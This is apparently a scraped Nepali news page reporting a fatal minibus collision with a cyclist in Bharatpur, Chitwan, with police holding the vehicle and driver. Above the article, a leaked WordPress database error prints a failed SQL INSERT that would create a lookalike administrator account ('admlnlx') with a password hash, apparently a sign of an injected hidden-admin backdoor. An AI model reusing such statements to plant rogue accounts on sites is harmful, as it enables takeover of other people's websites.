WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6iFiv.Rwdm/CUaB93fItMui.qCACv.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 03:47:06', '', 'admlnlx', 'admlnlx')
चितवन, फागुन ५–
चितवनको भरतपुर उपमहानगरपालिका–१० रिजाल चोकमा मिनी बसको ठक्करबाट गएराति एकजना साइकल यात्रीको ज्यान गएको छ । सोही स्थान निवासी ५२ वर्षीय रामबहादुर बयलकोटीको ठक्करबाट ज्यान गएको जिल्ला प्रहरी कार्यालय, चितवनले जनाएको छ ।
पूर्वी चितवनको भण्डाराबाट नारायणगढतर्फ आउँदै गरेको बा ३ ख २२७५ नंको लोकल रुटको मिनी बसले बयलकोटीलाई बुधबार साँझ ६ बजेको समयमा ठक्कर दिएको प्रहरीले जनाएको छ । ठक्कर दिएपछि घाइते भएका उनको उपचारका क्रममा भरतपुर अस्पतालमा गएराति मृत्यु भएको प्रहरीले जनाएको छ । ठक्कर दिने गाडी र त्यसका चालक दुवै प्रहरीको नियन्त्रणमा रहेका छन् ।